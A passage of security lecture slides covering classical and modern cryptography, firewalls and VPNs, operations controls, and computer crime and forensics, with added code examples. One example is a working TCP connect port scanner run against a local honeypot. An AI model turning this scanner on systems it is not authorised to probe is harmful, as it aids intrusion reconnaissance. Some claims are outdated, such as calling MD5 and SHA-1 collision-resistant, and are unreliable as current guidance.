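// The brute-force search from the slide: try all 26 keys and return the
// candidates best first (ties broken by smaller key).
function bruteForceCaesar(ciphertext) {
  const candidates = [];
  for (let k = 0; k < 26; k++) {
    const plaintext = caesarDecrypt(ciphertext, k);
    candidates.push({ key: k, plaintext, score: englishScore(plaintext) });
  }
  return candidates.sort((a, b) => b.score - a.score || a.key - b.key);
}

console.log(caesarEncrypt('meet me after the toga party', 3));
const best = bruteForceCaesar('GCUA VQ DTGCM')[0];
console.log(`key=${best.key} plaintext="${best.plaintext}" score=${best.score.toFixed(1)}`);
```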
Types of Cryptography
• Symmetric Cryptography
  – Deploys the same secret key to encrypt and decrypt messages
  – The secret key is shared between two parties
  – Encryption algorithm is the same as decryption algorithm
• Asymmetric (Public-key) Cryptography
  – Private key, public key
  – The secret key is not shared, and two parties can still communicate using their public keys
  – Encryption algorithm is different from decryption algorithm
Symmetric Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson-Prentice Hall
Public-Key Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson-Prentice Hall
Data Encryption Standard (DES)
• Derived in 1972 from the Lucifer algorithm developed by Horst Feistel at IBM
• For commercial and non-classified systems
• DES uses a 64-bit block size and a 56-bit key; it begins with a 64-bit key and strips 8 parity bits
• DEA is a 16-round cryptosystem designed for implementation in hardware
• 56-bit key = 2^56, or about 70 quadrillion, possible keys
• Distributed systems can break it; the U.S. Government no longer uses it
• Triple DES – three encryptions using DEA – is being used until AES is adopted
3DES
• Double encryption is subject to the meet-in-the-middle attack
• Encrypt on one end, decrypt on the other, and compare the values
• So Triple DES is used
• Can be done several different ways:
  – DES-EDE2 (encrypt with key 1, decrypt with key 2, encrypt with key 1)
  – DES-EE2 (encrypt with key 1, encrypt with key 2, encrypt with key 1)
  – DES-EE3 (encrypt with key 1, encrypt with key 2, encrypt with key 3) – most secure
AES
• Advanced Encryption Standard
• Block cipher that will replace DES
• Anticipated that Triple DES will remain approved for government use
• AES competition announced by NIST in January 1997 to find a replacement for DES
• October 2, 2000: NIST selected Rijndael
• Two Belgian cryptographers, Dr. Daemen and Dr. Rijmen
• Will be used by government for sensitive but unclassified documents
RSA
• Rivest, Shamir and Adleman
• Based on the difficulty of factoring a number which is the product of two large prime numbers, maybe 200 digits each
• Can be used for encryption, key exchange, and digital signatures
Elliptic Curve Cryptography (ECC)
• Elliptic curve discrete logarithms are harder to compute than general discrete logarithms
• Smaller key size for the same level of security
• Elliptic curve key of 160 bits = RSA key of 1024 bits
• Suited to smart cards and wireless devices (less memory and processing)
• Digital signatures, encryption and key management
Digital Signature Standard (DSS) and Secure Hash Standard (SHS)

• Enables use of the RSA digital signature algorithm or DSA – Digital Signature Algorithm (based on ElGamal)
• Both use the Secure Hash Algorithm to compute a message digest, which is then processed by DSA to produce or verify the signature. The message digest is used instead of the longer message because it is faster.
MD5 and SHA-1
• MD5 – Message Digest version 5
  – Developed by Ronald Rivest in 1991
  – Produces a 128-bit message digest
• SHA-1
  – Secure Hash Algorithm produces a 160-bit digest if the message is less than 2^64 bits
  – It is computationally infeasible to find the message from the message digest
  – It is computationally infeasible to find two different messages with the same message digest
  – Padding bits are added to the message to make it a multiple of 512 bits
Digital Signatures
Public Key Certification Systems
• A source could post a public key under the name of another individual
• Digital certificates counter this attack; a certificate binds an individual to their key
• A Certificate Authority (CA) acts as a notary to bind the key to the person
• CA must be cross-certified by another CA
Public Key Infrastructure
• Digital certificates
• Certificate Authorities (CA)
• Registration Authorities
• Policies and procedures
• Certificate revocation
• Non-repudiation support
• Timestamping
• Lightweight Directory Access Protocol
• Security-enabled applications
• Cross certification
Key Escrow
• Allowing law enforcement to obtain the keys to view people's encrypted data
• Escrow the key in two pieces with two trusted escrow agents
• Court order to get both pieces
• Clipper Chip – implemented in tamper-proof hardware
Key Management
• Key control
• Key recovery
• Key storage
• Key retirement/destruction
• Key change
• Key generation
• Key theft
• Frequency of key use
E-mail Security
• Non-repudiation
• Confidentiality of messages
• Authentication of Source
• Verification of delivery
Secure Multipurpose Internet Mail Extensions (S/MIME)
• Adds secure services to messages in MIME format
• Provides authentication through digital signatures
• Follows Public Key Cryptography Standards (PKCS)
• Uses X.509 Signatures
Pretty Good Privacy - PGP
• Phil Zimmermann
• Symmetric cipher using IDEA
• RSA is used for signatures and key distribution
• No CA; uses a "web of trust"
• Users can certify each other
Secure Sockets Layer (SSL)
• Developed by Netscape in 1994
• Uses public key to authenticate the server to the client
• Also provides optional client-to-server authentication
• Supports RSA public key algorithms, IDEA, DES, and 3DES
• Supports MD5 hashing
• HTTPS header
• Resides between the application and TCP layer
• Can be used by telnet, FTP, HTTP and e-mail protocols
• Based on X.509
• Transport Layer Security (TLS) is the successor to SSL
Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics
OSI Security Services
• A security service is a collection of security mechanisms, files, and procedures that help protect the network.
  – Authentication
  – Access control
  – Data confidentiality
  – Data integrity
  – Non-repudiation
  – Logging and monitoring
OSI Security Mechanisms
• A security mechanism is a control that is implemented in order to provide the 6 basic security services.
  – Encipherment (encryption and decryption)
  – Digital signature
  – Access control
  – Data integrity
  – Authentication
  – Traffic padding
  – Routing control
  – Notarization
Application Layer Security
• SET – Secure Electronic Transaction
  – Originated by Visa and MasterCard
  – Being overtaken by SSL
• HTTPS – Secure HTTP
  – Early standard for encrypting HTTP messages
  – Also being overtaken by SSL
• S/MIME – Secure Multipurpose Internet Mail Extensions
  – Email encryption and digital signature
Transport Layer Security
• SSH-2 – Secure Shell version 2
  – SSH has RSA certificates
  – Supports authentication, compression, confidentiality, and integrity
  – DES encryption
  – Because Secure Shell (SSH-2) supports authentication, compression, confidentiality, and integrity, SSH is used frequently for encrypted file transfer
• SSL – Secure Sockets Layer
  – Contains the SSL Record Protocol and the SSL Handshake Protocol
  – Uses symmetric encryption, and public key for authentication
  – MAC – Message Authentication Code for integrity
Firewalls
• Packet Filtering Firewall – First Generation
  – Screening router
  – Operates at the network and transport level
  – Examines source and destination IP address
  – Can deny based on ACLs
  – Can specify port
• Application Level Firewall – Second Generation
  – Proxy server
  – Copies each packet from one network to the other
  – Masks the origin of the data
  – Operates at layer 7 (Application Layer)
  – Reduces network performance since it has to analyze each packet and decide what to do with it
  – Also called Application Layer Gateway
Firewalls (cont.)
• Stateful Inspection Firewalls – Third Generation
  – Packets analyzed at all OSI layers
  – Queued at the network level
  – Faster than Application Level Gateway
• Dynamic Packet Filtering Firewalls – Fourth Generation
  – Allows modification of security rules
  – Mostly used for UDP
  – Remembers all of the UDP packets that have crossed the network's perimeter, and decides whether to enable packets to pass through the firewall
• Kernel Proxy – Fifth Generation
  – Runs in the NT kernel
  – Uses dynamic and custom TCP/IP-based stacks to inspect the network packets and to enforce security policies
Demilitarized Zone (DMZ)
Virtual Private Networks
• PPTP – Point-to-Point Tunneling Protocol
  – Works at the Data Link Layer
  – Single point-to-point connection from client to server
  – Common with asynchronous connections with NT and Win 95
• L2TP – Layer 2 Tunneling Protocol
  – Combination of PPTP and the earlier Layer 2 Forwarding Protocol (L2F)
  – Multiple protocols can be encapsulated within L2TP
  – Single point-to-point connection from client to server
  – Common with dial-up VPNs
• IPSec
  – Operates at the network layer
  – Allows multiple and simultaneous tunnels
  – Encrypts and authenticates IP data
  – Focuses more on network-to-network connectivity
Wireless Security
• WEP – Wired Equivalent Privacy – up to 128-bit WEP
• WPA (Wi-Fi Protected Access) is more secure; more recently WPA2
• WAP – Wireless Access Point
• SSID – Service Set Identifier – network name
  – Disable SSID broadcast
• Use encryption, VPN, treat as an external connection, directional antenna
Remote Node Security Protocols
• Password Authentication Protocol (PAP)
  – Remote security protocol. Provides identification and authentication.
  – Uses a static, replayable password for authentication (now considered weak)
  – Does not encrypt the user ID or password
• Challenge Handshake Authentication Protocol (CHAP)
  – Next evolution of PAP; uses stronger authentication
  – Non-replayable challenge/response
  – Verifies the identity of the node
  – Often used to enable network-to-network communication
  – Commonly used by remote access servers and xDSL, ISDN, and cable modems
Remote Access Authentication System
• TACACS – Terminal Access Controller Access Control System (TCP)
• TACACS+ – includes the use of two-factor authentication
• RADIUS – Remote Authentication Dial-In User Service (UDP)
TACACS
• Terminal Access Controller Access Control System
• Provides remote authentication and related services
• User password administered in a central database rather than in individual routers
• TACACS-enabled network device prompts for user name and static password
• TACACS-enabled network device queries the TACACS server to verify the password
• Does not support prompting for password change or use of dynamic tokens
TACACS+
• Terminal Access Controller Access Control System Plus
• Proprietary Cisco enhancement
• Two-factor authentication
• User can change password
• Ability to use secure tokens
• Better audit trails
RADIUS
• Remote Authentication Dial-In User Service
• Offers similar benefits to TACACS+
• Often used as a stepping stone to TACACS+
• RADIUS server contains dynamic password and network service access information (network ACLs)
• RADIUS is a fully open protocol; it can be customized for almost any security system
• Can be used with Kerberos and provides CHAP remote node authentication
• Does not work with:
  – AppleTalk Remote Access Protocol
  – NetBIOS Frame Protocol Control Protocol
  – NetWare Asynchronous Services Interface
  – X.25 PAD connection
Honeypots
• Production systems (e.g., firewalls, routers, Web servers, database servers) designed to do real work but that are watched and studied as network intrusions occur
Layered Security
Outline
• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics
Asset, Vulnerability, Threat
• Asset – anything that is a computer resource (e.g., software, data)
• Vulnerability – a weakness in a system that enables security to be violated (e.g., weak segregation of duties)
• Threat – an event that could cause harm by violating security (e.g., an operator abusing privileges)
CIA
• Confidentiality – operations controls affect confidentiality of data.
• Integrity – how well operations controls are implemented affects data integrity
• Availability – fault tolerance and ability to recover
Controls and Protections
• Controls to protect hardware, software and media from:
  – Threats in the operating environment
  – Internal and external intruders
  – Operators inappropriately accessing resources
Categories of Controls
• Preventive – prevent a harmful occurrence
  – Lower the number and impact of errors entering the system
  – Prevent unauthorized intruders from accessing the system
• Detective – detect after a harmful occurrence
  – Track unauthorized transactions
• Corrective – restore after a harmful occurrence
  – Data recovery
Separation of Duties
• Assign different tasks to different personnel
• No single person can completely compromise a system
• Related to the concept of least privilege – the least privileges required to do one's job
• Secure systems – System Administrator and Security Administrator must be different roles
• Highly secure systems – System Administrator, Security Administrator and Enhanced Operator must be different roles
System Administrator Functions
• Installing software
• Start-up and shutdown of the system
• Adding and removing users
• Performing backup and recovery
• Handling printers and queues
Security Administrator Functions
• Setting user clearances, initial passwords and other security characteristics for new users
• Changing security profiles for users
• Setting file sensitivity labels
• Setting security of devices
• Reviewing audit data
Least Privilege
• No access beyond job requirements
• Group-level privileges for operators
  – Read Only
  – Read/Write – usually on copies of the original data
  – Access Change – make changes to the original data
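Added example (not from the slides) of enforcing the role split of the Separation of Duties slide together with the least-privilege rule above, in code: a small hypothetical policy engine in which the role names follow the slides, the permission strings are made up from the slides' function lists, and mutually exclusive role sets implement the "secure" and "highly secure" rules. A final check looks for any one person who could both create an account and tamper with the audit data that would reveal it.

```python
"""Separation of duties and least privilege as an enforceable policy.
Added example, not the lecture's code: role names follow the slides, the
permission strings and the policy engine itself are hypothetical."""
from dataclasses import dataclass, field

# What each role may do, taken from the System/Security Administrator and
# operator group lists on the slides (permission names are made up).
ROLE_PERMISSIONS = {
    "sysadmin": {"install_software", "start_stop_system", "add_remove_users",
                 "backup_restore", "manage_printers"},
    "secadmin": {"set_clearance", "set_initial_password", "change_security_profile",
                 "set_sensitivity_label", "set_device_security", "manage_audit_data"},
    "enhanced_operator": {"read_data", "write_copy", "change_original"},
    "operator_rw": {"read_data", "write_copy"},
    "operator_ro": {"read_data"},
}

# Static separation of duties: no single person may hold every role in a set.
SOD_POLICY = {
    "secure": [{"sysadmin", "secadmin"}],
    "highly_secure": [{"sysadmin", "secadmin"},
                      {"sysadmin", "enhanced_operator"},
                      {"secadmin", "enhanced_operator"}],
}

class SeparationOfDutiesError(Exception):
    pass

def permissions_of(roles) -> set:
    """Union of the permissions granted by a collection of role names."""
    return set().union(*(ROLE_PERMISSIONS[r] for r in roles))

@dataclass
class AccessControl:
    level: str = "secure"
    roles: dict = field(default_factory=dict)   # user -> set of role names

    def assign(self, user: str, role: str) -> None:
        """Grant a role unless that would give one person a forbidden combination."""
        if role not in ROLE_PERMISSIONS:
            raise KeyError(f"unknown role {role!r}")
        proposed = self.roles.get(user, set()) | {role}
        for exclusive in SOD_POLICY[self.level]:
            if exclusive <= proposed:
                raise SeparationOfDutiesError(
                    f"{user} may not hold {sorted(exclusive)} at level {self.level}")
        self.roles[user] = proposed

    def permitted(self, user: str, action: str) -> bool:
        """Least privilege at decision time: only what a held role explicitly grants."""
        return action in permissions_of(self.roles.get(user, ()))

    def unused_privileges(self, user: str, actions_exercised) -> list:
        """Granted but never exercised: what a least-privilege review should revoke."""
        return sorted(permissions_of(self.roles.get(user, ())) - set(actions_exercised))

def single_points_of_compromise(ac: AccessControl) -> list:
    """Users who could both create an identity and tamper with the audit data
    that would expose it: exactly the combination the role split must prevent.
    Checks the stored state, so it also catches roles injected around assign()."""
    critical = {"add_remove_users", "manage_audit_data"}
    return sorted(u for u, roles in ac.roles.items() if critical <= permissions_of(roles))
```

The check in assign() enforces the rule at grant time; single_points_of_compromise() re-derives it from whatever is actually stored, which is what an audit needs when role data arrives from an HR feed or a migration that never went through assign().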
Operation Controls
• Resource Protection
• Hardware Controls
• Software Controls
Resource Protection
• Protecting resources from disclosure, alteration or misuse
  – Hardware – routers, firewalls, computers, printers
  – Software – libraries, vendor software, OS software
  – Data resources – backup data, user data, logs
Hardware Controls
• Hardware maintenance
  – Requires physical and logical access by support staff and vendors
  – Supervision of vendors and maintenance; background checks
• Maintenance accounts
  – Disable maintenance accounts when not needed
  – Change default passwords
• Diagnostic port control
  – Specific ports for maintenance
  – Should be blocked from external access
• Hardware physical controls – require locks and alarms
  – Sensitive operator terminals
  – Media storage rooms
  – Server and communications equipment
  – Modem pools and circuit rooms
Software Controls
• Anti-virus management – prevent the download of viruses
• Software testing – formal, rigid software testing process
• Software utilities – control of powerful utilities
• Safe software storage – prevent modification of software and of backup copies
• Backup controls – test and restore backups
Physical Protection
• Protection from physical access
  – Hardware – routers, firewalls, computers, printers
  – Software – libraries, vendor software, OS software
• Physical piggybacking – following an authorized person through a door
Monitoring and Audits
• Monitoring – problem identification and resolution
• Monitor for:
  – Illegal software installation
  – Hardware faults
  – Error states
  – Operational events
Penetration Testing
• Testing a network's defenses by using the same techniques as external intruders
  – Scanning and probing – port scanners
  – Demon dialing – war dialing for modems
  – Sniffing – capturing data packets
  – Dumpster diving – searching paper disposal areas
  – Social engineering – most common; get information simply by asking
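Added example (not the lecture's code) tying the Honeypots slide to the scanning item above: a TCP connect() port scanner run against a loopback honeypot that records every connection it receives. The host, the ports and the FTP-style banner are constructed so the script runs offline.

```python
"""A TCP connect() scan against a loopback honeypot. Added example for the
Honeypots and Penetration Testing slides, not the lecture's own code: the
honeypot, its banner and the scanned ports are constructed locally."""
import socket
import threading
import time
from concurrent.futures import ThreadPoolExecutor

class Honeypot:
    """Decoy TCP service that does no real work: nobody has a legitimate reason
    to connect, so every connection is recorded as a suspicious event."""

    def __init__(self, banner: bytes = b"220 ftp.internal.example FTP ready\r\n"):
        self.banner = banner
        self.events = []                      # one dict per connection seen
        self._lock = threading.Lock()
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.bind(("127.0.0.1", 0))     # OS-assigned port (constructed target)
        self._sock.listen(16)
        self.port = self._sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, peer = self._sock.accept()
            except OSError:                   # listener closed
                return
            threading.Thread(target=self._handle, args=(conn, peer), daemon=True).start()

    def _handle(self, conn, peer):
        with conn:
            conn.settimeout(1.0)
            try:
                conn.sendall(self.banner)     # speak first, like a real FTP daemon
                first = conn.recv(64)         # whatever the client sends, if anything
            except OSError:
                first = b""
        with self._lock:
            self.events.append({"peer": peer, "port": self.port, "data": first, "at": time.time()})

    def wait_for(self, count: int, timeout: float = 2.0) -> bool:
        """Block until at least `count` events are recorded (handlers run in threads)."""
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            with self._lock:
                if len(self.events) >= count:
                    return True
            time.sleep(0.01)
        return False

    def close(self):
        try:
            self._sock.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass
        self._sock.close()

def tcp_connect_scan(host: str, ports, timeout: float = 0.5, workers: int = 32) -> dict:
    """Connect scan: a full three-way handshake per port, so no raw-socket
    privilege is needed, but every probe is visible to the target. Returns
    {open_port: banner}, with banner b"" when the service stays silent."""
    def probe(port):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:                   # refused, filtered or timed out
                return port, None
            try:
                return port, s.recv(128)
            except OSError:
                return port, b""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return {port: banner for port, banner in pool.map(probe, ports) if banner is not None}

def closed_loopback_port() -> int:
    """Reserve a port from the OS and release it, giving a known-closed target."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

if __name__ == "__main__":
    hp = Honeypot()
    closed = closed_loopback_port()
    hits = tcp_connect_scan("127.0.0.1", [hp.port, closed])
    hp.wait_for(1)
    print("open:", hits)
    print("honeypot saw:", hp.events)
    hp.close()
```

A connect() scan completes the handshake, so the honeypot (or any logging service) sees the source address of every probe; a SYN scan would be quieter but needs raw sockets. The honeypot side shows why a decoy is such a cheap detector: it has no users, so one connection is already an alert rather than something to be filtered out of normal traffic.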
Auditing
• IT auditors audit:
  – Backup controls
  – System and transaction controls
  – Data library controls
  – Systems development standards
  – Data center security
  – Contingency plans
Audit Trails
• Enables tracking of the history of modifications, deletions and additions
• Allows for accountability
• Audit logs should record:
  – Transaction time and date
  – Who processed the transaction
  – Which terminal was used
  – Various security events relating to the transaction
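Added example (not from the slides) of an audit trail that records the fields listed above and makes them tamper-evident: each record's HMAC covers the previous record's HMAC, so editing, deleting or reordering an entry breaks verification. The key and the log entries are constructed.

```python
"""Tamper-evident audit trail. Added example, not the lecture's code: records
carry the fields the Audit Trails slide asks for (time, who, which terminal,
security event) and are chained with an HMAC. Key and entries are constructed."""
import hashlib
import hmac
import json
from datetime import datetime, timezone

GENESIS = b"\x00" * 32      # chain value before the first record

def _record_mac(key: bytes, prev_mac: bytes, record: dict) -> str:
    """HMAC-SHA256 over the previous MAC and a canonical JSON form of the record."""
    canonical = json.dumps(record, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, prev_mac + canonical, hashlib.sha256).hexdigest()

class AuditTrail:
    def __init__(self, key: bytes):
        self._key = key
        self.records = []
        self._prev = GENESIS

    def append(self, user: str, terminal: str, event: str, outcome: str, when: str = None) -> dict:
        """Append one record; `when` is an ISO-8601 timestamp (now, if omitted)."""
        record = {
            "seq": len(self.records),
            "time": when or datetime.now(timezone.utc).isoformat(),
            "user": user,
            "terminal": terminal,
            "event": event,
            "outcome": outcome,
        }
        record["mac"] = _record_mac(self._key, self._prev, record)
        self._prev = bytes.fromhex(record["mac"])
        self.records.append(record)
        return record

    def head(self) -> str:
        """Latest MAC; keep a copy outside the log (auditor, write-once media) so
        that silently dropping the newest records is detectable."""
        return self._prev.hex()

def verify_trail(records, key: bytes, expected_head: str = None):
    """Return (ok, index); when ok is False, index is the first record that fails."""
    prev = GENESIS
    for i, rec in enumerate(records):
        body = {k: v for k, v in rec.items() if k != "mac"}
        if body.get("seq") != i:                   # gap or reorder
            return False, i
        if not hmac.compare_digest(_record_mac(key, prev, body), rec.get("mac", "")):
            return False, i                        # edited record or wrong key
        prev = bytes.fromhex(rec["mac"])
    if expected_head is not None and not hmac.compare_digest(prev.hex(), expected_head):
        return False, len(records)                 # tail truncated
    return True, len(records)
```

The chain alone cannot see truncation of the most recent records; that is what head() is for: store the latest MAC with a third party and pass it as expected_head when verifying. The same construction is what lets a log offered as evidence later (see the forensics slides) be shown unaltered since collection.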
Illegal Computer Operations
• Eavesdropping – sniffing, dumpster diving, social engineering
• Fraud – collusion, falsified transactions
• Theft – information or trade secrets, physical hardware and software theft
• Sabotage – Denial of Service (DoS), production delays
• External attacks – malicious cracking, scanning, war dialing
Outline
• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics
Computer Crimes
• Crimes against the computer
• Crimes using a computer
Most Common Crimes
• Denial of Service (DoS)
• Theft of passwords
• Network intrusions
• Emanation eavesdropping
• Social engineering
• Illegal content of material (e.g., pornography)
• Fraud – using a computer to perpetrate crimes, e.g., auctions of non-existent merchandise
• Software piracy
• Dumpster diving
• Malicious code
• Spoofing of IP addresses
• Information warfare – attacking the infrastructure of a nation, including the military and the power grid
• Destruction or alteration of information
• Use of readily available attack scripts – script kiddies, unskilled users
• Masquerading
• Embezzlement – illegally acquiring funds
• Data diddling – modification of data
• Terrorism
Intellectual Property Law
• Patent – provides the owner a legally enforceable right to exclude others for a specified time (in the U.S., 20 years from the filing date; 17 years from grant under the pre-1995 rule)
• Copyright – protects original works of authorship; can be used for software and databases
• Trade Secret – secures confidentiality of proprietary technical and business-related information. The company must meet these requirements:
  – Invested resources to develop the information
  – Valuable to the business
  – Valuable to a competitor
  – Non-obvious information
  – Took reasonable steps to keep the information secret
• Trademark – establishes a word, name, symbol, color or sound used to identify and distinguish goods
Information Privacy Laws
• Intent varies widely from country to country
• European Union – has developed more protective laws for individual privacy
  – Transfer of personal data from the EU to the US is prohibited unless adequate protections are in place
Electronic Monitoring
• Keystroke monitoring, e-mail monitoring, surveillance cameras, badges and magnetic card keys all allow monitoring of individuals.
• Key to monitoring: it must be done lawfully and applied consistently.
E-mail monitoring
• Inform users that all e-mail is being monitored by displaying a log-on banner
  – Banner should state: logging on to the system constitutes consent to monitoring; unauthorized access is prohibited and subject to prosecution
• Ensure monitoring is uniformly applied
• Explain acceptable use
• Explain who can read e-mail and how long it is backed up
• No guarantee of privacy
Computer Forensics
• Collecting information from and about computer systems that is admissible in a court of law.
Evidence Life Cycle
• Discovery and recognition
• Protection
• Recording
• Collection
  – Collect all relevant storage media
  – Image the hard disk before removing power, and hash the image so its integrity can be demonstrated later
  – Print out the screen
  – Avoid degaussing equipment
• Identification (tagging and marking)
• Preservation
  – Protect from magnetic erasure
  – Store in a proper environment
• Transportation
• Presentation in court
• Return to evidence owner
Conducting the Investigation
• A corporate investigation should include management, corporate security, Human Resources, the legal department and other appropriate staff.
• A committee should be set up beforehand to address the following issues:
  – Establishing liaison with law enforcement
  – Deciding when and if to bring in law enforcement (in the U.S., the FBI and Secret Service)
  – Setting up a means of reporting computer crimes
  – Establishing procedures for handling reports of computer crimes
  – Planning and conducting investigations
  – Involving senior management, corporate security, Human Resources and the legal department
  – Ensuring proper collection of evidence
Good Sources of Evidence
• Telephone records
• Video cameras
• Audit trails
• System logs
• System backups
• Witnesses
• Results of surveillance
• E-mails
MOM
• Motive
• Opportunity
• Means
Interview
• If interviewing do not give information away to suspect
• Questions should be scripted
• Don’t use original documents in the interview
Questions?